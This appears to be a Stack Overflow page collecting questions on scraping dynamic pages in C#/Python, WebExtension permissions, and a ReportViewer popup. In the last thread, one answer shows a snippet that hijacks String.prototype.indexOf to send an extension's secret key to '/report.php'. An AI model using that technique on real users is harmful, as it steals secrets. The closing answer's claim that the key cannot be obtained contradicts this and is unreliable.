I'm scraping dynamic data from a website. For some reason the PageSource that I get() is partial. However, it is not partial when I view the page source directly in the Chrome or Firefox browsers. I'm looking for an approach that will let me scrape the complete data from the page.
For my application I need to scrape programmatically, using a .NET web browser or similar. I've tried Selenium WebDriver 2.48.2 with ChromeDriver, PhantomJSDriver, WebClient, and HttpWebRequest, all on .NET 4.6.1.
The url: http://contests.covers.com/KingOfCovers/Contestant/PendingPicks/ARTDB
None of the following are working...
Attempt #1: HttpWebRequest
var urlContent = "";
try
{
    var request = (HttpWebRequest)WebRequest.Create(url);
    request.CookieContainer = new CookieContainer();
    if (cookies != null)
    {
        foreach (Cookie cookie in cookies)
        {
            request.CookieContainer.Add(cookie);
        }
    }
    var responseTask = Task.Factory.FromAsync<WebResponse>(request.BeginGetResponse, request.EndGetResponse, null);
    using (var response = (HttpWebResponse)await responseTask)
    {
        if (response.Cookies != null)
        {
            foreach (Cookie cookie in response.Cookies)
            {
                cookies.Add(cookie);
            }
        }
        using (var sr = new StreamReader(response.GetResponseStream()))
        {
            urlContent = sr.ReadToEnd();
        }
    }
}
catch (WebException ex)
{
    // log/handle the failure as appropriate
    System.Diagnostics.Debug.WriteLine(ex.Message);
}
Attempt #2: WebClient
// requires async method signature
using (WebClient client = new WebClient())
{
    var task = await client.DownloadStringTaskAsync(url);
    return task;
}
Attempt #3: PhantomJSDriver
var driverService = PhantomJSDriverService.CreateDefaultService();
driverService.HideCommandPromptWindow = true;
using (var driver = new PhantomJSDriver(driverService))
{
    driver.Navigate().GoToUrl(url);
    WaitForAjax(driver);
    string source = driver.PageSource;
    return source;
}
public static void WaitForAjax(PhantomJSDriver driver)
{
    while (true) // Handle timeout somewhere
    {
        var ajaxIsComplete = (bool)(driver as IJavaScriptExecutor).ExecuteScript("return jQuery.active == 0");
        if (ajaxIsComplete)
            break;
        Thread.Sleep(100);
    }
}
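For the timeout that the comment above leaves open, one option is to let WebDriverWait (from OpenQA.Selenium.Support.UI) enforce it. This is a sketch only, not code I have actually run against this site:
public static void WaitForAjaxWithTimeout(IWebDriver driver, int timeoutSeconds = 30)
{
    // same jQuery.active check as above, but WebDriverWait throws
    // WebDriverTimeoutException if jQuery never goes idle
    var wait = new WebDriverWait(driver, TimeSpan.FromSeconds(timeoutSeconds));
    wait.Until(d => (bool)((IJavaScriptExecutor)d).ExecuteScript("return jQuery.active == 0"));
}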
I also tried ChromeDriver with a page object model. That code is too long to paste here; nonetheless, it produces exactly the same result as the other three attempts.
Expected Results
The data table from the url is complete, with no missing data. In the expected-results screenshot (compare with the actual-results screenshot below), the thing to observe is that there is NOT a "..."; the data is there instead. This can be reproduced by opening the url in Firefox or Chrome, right-clicking, and choosing View Page Source.
Actual Results
Observe that where the "..." appears there is a big gap, as the arrow in the screenshot indicates. There should be many rows of content in place of that "...". This can be reproduced using any of the attempts above.
Please note that the url serves dynamic data, so you will likely not see exactly the same results as the screenshots; the exercise can still be repeated, it will simply look different. A quick test for the missing data is to compare the page source line counts: the "complete" version has nearly twice as many lines of html.
But in your C#, where are you copying from? In your code you have urlContent = sr.ReadToEnd(); — how are you viewing or copying the result of this? Are you copying from the debugger? If so, it may be the debugger's object inspector that is trimming it. Have you tried taking the result from urlContent and saving it to a file? e.g. System.IO.File.WriteAllText(@"temp.txt", urlContent);
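Following up on that suggestion, a quick way to rule out debugger truncation and to run the line-count comparison mentioned earlier (a sketch; the file names are arbitrary):
// dump the scraped markup to disk so it can be inspected outside the debugger
System.IO.File.WriteAllText(@"scraped.html", urlContent);

// compare line counts against a copy saved via the browser's View Page Source
var scrapedLines = System.IO.File.ReadAllLines(@"scraped.html").Length;
var browserLines = System.IO.File.ReadAllLines(@"browser.html").Length;
Console.WriteLine($"scraped: {scrapedLines} lines, browser: {browserLines} lines");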
Related
I'm trying to scrape Instagram using Python and Selenium. Goal is to get the url of all the posts, number of comments, number of likes, etc.
I was able to scrape some data, but for some reason the page doesn't show more than the latest 12 entries. I'm unable to figure out a way to show all the other entries. I've even tried scrolling down and then reading the page, but it only gives 12. I checked the source and am unable to find how to get the rest of the entries. It looks like the 12 entries are embedded in the script tag, and I don't see them anywhere else.
from selenium import webdriver
from bs4 import BeautifulSoup as bs
import json
import time

driver = webdriver.Chrome('chromedriver.exe')
driver.get('https://www.instagram.com/fazeapparel/?hl=en')
source = driver.page_source
data = bs(source, 'html.parser')
body = data.find('body')
script = body.find('script', text=lambda t: t.startswith('window._sharedData'))
page_json = script.text.split(' = ', 1)[1].rstrip(';')
data = json.loads(page_json)
Using the data retrieved, I was able to find the information and collect them.
for each in data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_owner_to_timeline_media']['edges']:
    link = 'https://www.instagram.com'+'/p/'+each['node']['shortcode']+'/'
    posttext = each['node']['edge_media_to_caption']['edges'][0]['node']['text'].replace('\n','')
    comments = each['node']['edge_media_to_comment']['count']
    likes = each['node']['edge_liked_by']['count']
    postimage = each['node']['thumbnail_src']
    isvideo = each['node']['is_video']
    postdate = time.strftime('%Y %b %d %H:%M:%S', time.localtime(each['node']['taken_at_timestamp']))
    links.append([link, posttext, comments, likes, postimage, isvideo, postdate])
I've even created a scroll function to scroll the window before scraping the data, but it still only returns 12.
Is there any way I can get more than 12 entries? This account has 46 entries and I'm unable to find them anywhere in the code. Please help!
Edit: I think the data is embedded within React, so it's not showing all the posts.
Have you added using OpenQA.Selenium.Support.UI? It has WebDriverWait, and you can wait for the element to be visible. Sorry for doing this in C#.
boxes should return all the posts.
Again, I know it isn't in Python, but I hope it helps.
IWebDriver driver = new ChromeDriver("C:\\Users\\admin\\downloads", options);
WebDriverWait wait = new WebDriverWait(driver, time);
driver.Navigate().GoToUrl("https://www.instagram.com/cnn");
IWebElement mainDocument = wait.Until(SeleniumExtras.WaitHelpers.ExpectedConditions.ElementExists(By.TagName("body")));
IWebElement element = mainDocument.FindElement(By.CssSelector("#react-root > section > main > div > div._2z6nI > article > div > div"));
IList<IWebElement> boxes = element.FindElements(By.TagName("div"));
foreach (var posts in boxes)
{
    //do stuff here
}
EDIT:
The page is making an AJAX call on the back end to load the next posts when you scroll, so one approach is to run a script that scrolls down and to call that script from Selenium. I would add logic with a timer to wait while the script runs and check whether it returns "STOP"; any kind of thread sleep blocks the thread, so I would use some sort of timer to call the method that runs my script. (A sketch of driving this from C# follows the script below.)
function scrollDown() {
    //once this bottom element disappears we found all the posts
    var bottom = document.querySelector('._4emnV')
    if (bottom != null) {
        window.scroll(0, 999999)
    }
    else
    {
        return "STOP"
    }
}
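Calling that from Selenium could look roughly like the following sketch. The '._4emnV' selector is taken from the script above and may well change; a real version should also replace the crude Thread.Sleep with proper waiting and add an overall timeout.
var js = (IJavaScriptExecutor)driver;
while (true)
{
    // same logic as scrollDown(): keep scrolling until the "loading" element disappears
    var result = (string)js.ExecuteScript(
        "var bottom = document.querySelector('._4emnV');" +
        "if (bottom != null) { window.scroll(0, 999999); return 'MORE'; }" +
        "return 'STOP';");
    if (result == "STOP")
        break;
    Thread.Sleep(1000); // crude pause to give the AJAX call time to load the next batch
}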
I am working on a WebExtension in Firefox for use internally at work. The purpose of the extension is to insert relevant information from our ServiceNow instance into the Nagios host/service pages.
I am currently trying to insert the state of tickets into the history tab of Nagios. My script looks like this:
var table = document.getElementById('id_historytab_table');
var table = table.getElementsByTagName('tbody');
var table = table[1];
var len = table.children.length;
const url = "https://[domain].service-now.com/api/now/table/task?sysparm_limit=1&number="

for (i = 1; i <= len; i++) {
    var col = table.rows[i].cells[2];
    if (col.textContent.startsWith("TKT")) {
        var tkt = col.textContent;
        //console.log(tkt);
        //console.log(url + tkt);
        var invocation = new XMLHttpRequest();
        invocation.open("get", url + tkt, true);
        invocation.withCredentials = true;
        invocation.onreadystatechange = function() {
            if (this.readyState == this.DONE) {
                //console.log('received');
                console.log(this.responseText);
                //console.log(JSON.parse(this.responseText).result[0].state);
            }
        };
        invocation.send();
    };
};
This successfully gets the ticket number from each row of the history tab and makes a GET request. I can see the requests in my ServiceNow REST log and everything looks good there. However, the response is never received.
If I copy and paste the above from my content-script.js directly into my console, I am able to iterate through the rows, get the ticket numbers, and successfully receive responses from ServiceNow. So it works in the console, but not in the WebExtension for some reason. I am about at the end of my knowledge of extensions and JavaScript, though, and am not sure what else to do.
I figured out the problem. In order for the WebExtension to receive the response, the URL needs to be listed under permissions in the manifest.json. Adding:
"permissions": [ "url" ],
resolved the issue, and I immediately began seeing the response bodies I was expecting.
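For reference, a minimal manifest.json along those lines might look like the sketch below; the extension name and the Nagios match pattern are made up for illustration, and the [domain] placeholder from the question is kept as-is:
{
  "manifest_version": 2,
  "name": "servicenow-nagios-helper",
  "version": "1.0",
  "permissions": [
    "https://[domain].service-now.com/*"
  ],
  "content_scripts": [
    {
      "matches": ["https://nagios.example.com/*"],
      "js": ["content-script.js"]
    }
  ]
}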
Most of the answers I have read concerning this subject point to either the System.Windows.Forms.WebBrowser class or the COM interface mshtml.HTMLDocument from the Microsoft HTML Object Library assembly.
The WebBrowser class did not lead me anywhere. The following code fails to retrieve the HTML code as rendered by my web browser:
[STAThread]
public static void Main()
{
    WebBrowser wb = new WebBrowser();
    wb.Navigate("https://www.google.com/#q=where+am+i");
    wb.DocumentCompleted += delegate(object sender, WebBrowserDocumentCompletedEventArgs e)
    {
        mshtml.IHTMLDocument2 doc = (mshtml.IHTMLDocument2)wb.Document.DomDocument;
        foreach (IHTMLElement element in doc.all)
        {
            System.Diagnostics.Debug.WriteLine(element.outerHTML);
        }
    };
    Form f = new Form();
    f.Controls.Add(wb);
    Application.Run(f);
}
The above is just an example. I'm not really interested in finding a workaround for figuring out the name of the town where I am located. I simply need to understand how to retrieve that kind of dynamically generated data programmatically.
(Call new System.Net.WebClient().DownloadString("https://www.google.com/#q=where+am+i"), save the resulting text somewhere, search for the name of the town where you are currently located, and let me know if you were able to find it.)
And yet, when I access "https://www.google.com/#q=where+am+i" from my web browser (IE or Firefox), I see the name of my town written on the web page. In Firefox, if I right-click on the name of the town and select "Inspect Element (Q)", I clearly see the name of the town written in the HTML code, which happens to look quite different from the raw HTML returned by WebClient.
After I got tired of playing with System.Windows.Forms.WebBrowser, I decided to give mshtml.HTMLDocument a shot, only to end up with the same useless raw HTML:
public static void Main()
{
    mshtml.IHTMLDocument2 doc = (mshtml.IHTMLDocument2)new mshtml.HTMLDocument();
    doc.write(new System.Net.WebClient().DownloadString("https://www.google.com/#q=where+am+i"));
    foreach (IHTMLElement e in doc.all)
    {
        System.Diagnostics.Debug.WriteLine(e.outerHTML);
    }
}
I suppose there must be an elegant way to obtain this kind of information. Right now all I can think of is to add a WebBrowser control to a form, have it navigate to the URL in question, send the keys CTRL+A, copy whatever happens to be displayed on the page to the clipboard, and attempt to parse it. That's a horrible solution, though.
I'd like to contribute some code to Alexei's answer. A few points:
Strictly speaking, it may not always be possible to determine when the page has finished rendering with 100% probability. Some pages are quite complex and use continuous AJAX updates. But we can get quite close, by polling the page's current HTML snapshot for changes and checking the WebBrowser.IsBusy property. That's what LoadDynamicPage does below.
Some time-out logic has to be present on top of the above, in case the page rendering is never-ending (note CancellationTokenSource).
Async/await is a great tool for coding this, as it gives a linear code flow to our asynchronous polling logic, which greatly simplifies it.
It's important to enable HTML5 rendering using Browser Feature Control, as WebBrowser runs in IE7 emulation mode by default. That's what SetFeatureBrowserEmulation does below.
This is a WinForms app, but the concept can be easily converted into a console app.
This logic works well on the URL you've specifically mentioned: https://www.google.com/#q=where+am+i.
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace WbFetchPage
{
    public partial class MainForm : Form
    {
        public MainForm()
        {
            SetFeatureBrowserEmulation();
            InitializeComponent();
            this.Load += MainForm_Load;
        }

        // start the task
        async void MainForm_Load(object sender, EventArgs e)
        {
            try
            {
                var cts = new CancellationTokenSource(10000); // cancel in 10s
                var html = await LoadDynamicPage("https://www.google.com/#q=where+am+i", cts.Token);
                MessageBox.Show(html.Substring(0, 1024) + "..."); // it's too long!
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.Message);
            }
        }

        // navigate and download
        async Task<string> LoadDynamicPage(string url, CancellationToken token)
        {
            // navigate and await DocumentCompleted
            var tcs = new TaskCompletionSource<bool>();
            WebBrowserDocumentCompletedEventHandler handler = (s, arg) =>
                tcs.TrySetResult(true);

            using (token.Register(() => tcs.TrySetCanceled(), useSynchronizationContext: true))
            {
                this.webBrowser.DocumentCompleted += handler;
                try
                {
                    this.webBrowser.Navigate(url);
                    await tcs.Task; // wait for DocumentCompleted
                }
                finally
                {
                    this.webBrowser.DocumentCompleted -= handler;
                }
            }

            // get the root element
            var documentElement = this.webBrowser.Document.GetElementsByTagName("html")[0];

            // poll the current HTML for changes asynchronously
            var html = documentElement.OuterHtml;
            while (true)
            {
                // wait asynchronously, this will throw if cancellation requested
                await Task.Delay(500, token);

                // continue polling if the WebBrowser is still busy
                if (this.webBrowser.IsBusy)
                    continue;

                var htmlNow = documentElement.OuterHtml;
                if (html == htmlNow)
                    break; // no changes detected, end the poll loop

                html = htmlNow;
            }

            // consider the page fully rendered
            token.ThrowIfCancellationRequested();
            return html;
        }

        // enable HTML5 (assuming we're running IE10+)
        // more info: https://stackoverflow.com/a/18333982/1768303
        static void SetFeatureBrowserEmulation()
        {
            if (LicenseManager.UsageMode != LicenseUsageMode.Runtime)
                return;

            var appName = System.IO.Path.GetFileName(System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName);
            Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION",
                appName, 10000, RegistryValueKind.DWord);
        }
    }
}
Your web-browser code looks reasonable: wait for something, then grab the current content. Unfortunately there is no official "I'm done executing JavaScript, feel free to steal content" notification from either the browser or JavaScript.
Some sort of active wait (not Sleep, but a Timer) may be necessary, and it will be page-specific. Even if you use a headless browser (e.g. PhantomJS) you'll have the same issue.
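A minimal sketch of that active-wait idea, assuming a WinForms context: poll the WebBrowser control with a Timer instead of sleeping, and stop once the HTML snapshot stops changing. The webBrowser field and the OnPageSettled callback are placeholders, not part of the answer above.
var timer = new System.Windows.Forms.Timer { Interval = 500 };
string lastHtml = null;
timer.Tick += (s, e) =>
{
    if (webBrowser.IsBusy) return;                    // still fetching resources
    var html = webBrowser.Document?.Body?.OuterHtml;  // current snapshot
    if (html != null && html == lastHtml)
    {
        timer.Stop();                                 // content stopped changing
        OnPageSettled(html);                          // hypothetical callback
    }
    lastHtml = html;
};
timer.Start();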
I was asked to take a look at what should be a simple problem with one of our web pages for a small dashboard web app. This app just shows some basic state info for underlying backend apps which I work heavily on. The issue is as follows:
On a page where a user can input parameters and request to view a report with the given user input, a button invokes a JS function which opens a new page in the browser to show the rendered report. The code looks like this:
$('#btnShowReport').click(function () {
    document.getElementById("Error").innerHTML = "";
    var exists = CheckSession();
    if (exists) {
        window.open('<%=Url.Content("~/Reports/Launch.aspx?Report=Short&Area=1") %>');
    }
});
The page that is then opened has the following code which is called from Page_Load:
rptViewer.ProcessingMode = ProcessingMode.Remote
rptViewer.AsyncRendering = True
rptViewer.ServerReport.Timeout = CInt(WebConfigurationManager.AppSettings("ReportTimeout")) * 60000
rptViewer.ServerReport.ReportServerUrl = New Uri(My.Settings.ReportURL)
rptViewer.ServerReport.ReportPath = "/" & My.Settings.ReportPath & "/" & Request("Report")
'Set the report to use the credentials from web.config
rptViewer.ServerReport.ReportServerCredentials = New SQLReportCredentials(My.Settings.ReportServerUser, My.Settings.ReportServerPassword, My.Settings.ReportServerDomain)
Dim myCredentials As New Microsoft.Reporting.WebForms.DataSourceCredentials
myCredentials.Name = My.Settings.ReportDataSource
myCredentials.UserId = My.Settings.DatabaseUser
myCredentials.Password = My.Settings.DatabasePassword
rptViewer.ServerReport.SetDataSourceCredentials(New Microsoft.Reporting.WebForms.DataSourceCredentials(0) {myCredentials})
rptViewer.ServerReport.SetParameters(parameters)
rptViewer.ServerReport.Refresh()
I have omitted some code which builds up the parameters for the report, but I doubt any of that is relevant.
The problem is that, when the user clicks the show report button and this new page opens up, depending on the types of parameters they use, the report could take quite some time to render, and in the meantime the original page becomes completely unresponsive. The moment the report page actually renders, the main page begins functioning again. Where should I start (Google keywords, ReportViewer properties, etc.) if I want to fix this behavior, such that the other page can load asynchronously without affecting the main page?
Edit -
I tried doing the following, which was in a linked answer in a comment here:
$.ajax({
    context: document.body,
    async: true, //NOTE THIS
    success: function () {
        window.open(Address);
    }
});
This replaced the window.open call. It seems to work, but when I checked the documentation, trying to understand what this is doing, I found this:
The .context property was deprecated in jQuery 1.10 and is only maintained to the extent needed for supporting .live() in the jQuery Migrate plugin. It may be removed without notice in a future version.
I removed the context property entirely and it didn't seem to affect the code at all... Is it OK to use this ajax call in this way to open up the other window, or is there a better approach?
Using a timeout should open the window without blocking your main page
$('#btnShowReport').click(function () {
    document.getElementById("Error").innerHTML = "";
    var exists = CheckSession();
    if (exists) {
        setTimeout(function() {
            window.open('<%=Url.Content("~/Reports/Launch.aspx?Report=Short&Area=1") %>');
        }, 0);
    }
});
This is a long shot, but have you tried opening the window with a blank URL first, and subsequently changing the location?
$("#btnShowReport").click(function(){
If (CheckSession()) {
var pop = window.open ('', 'showReport');
pop = window.open ('<%=Url.Content("~/Reports/Launch.aspx?Report=Short&Area=1") %>', 'showReport');
}
})
use
$('#btnShowReport').click(function () {
    document.getElementById("Error").innerHTML = "";
    var exists = CheckSession();
    if (exists) {
        window.location.href = '<%=Url.Content("~/Reports/Launch.aspx?Report=Short&Area=1") %>';
    }
});
it will work.
I created a Google Chrome extension which redirects all requests for a javascript file on a website to a modified version of that file on my hard drive.
It works, and simplified, I do it like this:
... redirectUrl: chrome.extension.getURL("modified.js") ...
Modified.js is the same javascript file except that I modified a line in the code.
I changed something that looks like
var message = mytext.value;
to var message = aes.encrypt(mytext.value,"mysecretkey");
My question now is: is it possible for the admin of the website whose javascript file I redirect to modify his webpage so that he can obtain "mysecretkey"? (The admin knows how my extension works and which line is modified, but doesn't know the key used.)
Thanks in advance
Yes, the "admin" can read the source code of your code.
Your method is very insecure. There are two ways to read "mysecretkey".
Let's start with the non-trivial one: Get a reference to the source. Examples, assume that your aes.encrypt method looks like this:
(function() {
    var aes = {encrypt: function(val, key) {
        if (key.indexOf('whatever')) {/* ... */}
    }};
})();
Then it can be compromised using:
(function(indexOf) {
    String.prototype.indexOf = function(term) {
        if (term !== 'known') (new Image).src = '/report.php?t=' + term;
        return indexOf.apply(this, arguments);
    };
})(String.prototype.indexOf);
Many prototype methods result in possible leaking, as well as arguments.callee. If the "admin" wants to break your code, he'll surely be able to achieve this.
The other method is much easier to implement:
var x = new XMLHttpRequest();
x.open('GET', '/possiblymodified.js');
x.onload = function() {
    console.log(x.responseText); // Full source code here....
};
x.send();
You could replace the XMLHttpRequest method, but at this point you're just playing a cat-and-mouse game. Whenever you think you've secured your code, the other side will find a way to break it (for instance, using the first method described).
Since the admin can control any aspect of the site, they could easily modify aes.encrypt to post the second argument to them and then continue as normal. Therefore your secret key would be immediately revealed.
No. The Web administrator would have no way of seeing what you set it to before it could get sent to the server where he could see it.